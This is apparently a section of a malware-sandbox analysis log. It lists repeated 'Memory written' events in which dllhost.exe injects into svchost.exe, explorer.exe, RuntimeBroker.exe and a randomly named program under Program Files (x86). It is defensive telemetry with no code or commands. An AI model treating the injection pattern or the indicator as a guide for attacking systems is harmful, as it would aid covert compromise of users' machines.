Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 282A2110000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 282A2110000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 2537C620000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29B59750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 2537C620000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29B59750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21744F70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F02ED50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21744F70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 239543A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B9C9A20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B9C9CB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29F0AD90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29F0ADC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C585A50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C585A80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BEA4190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BEA41C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1050000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 720000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 550000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1470000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1490000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1240000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 4A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1270000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1290000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 710000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D80000
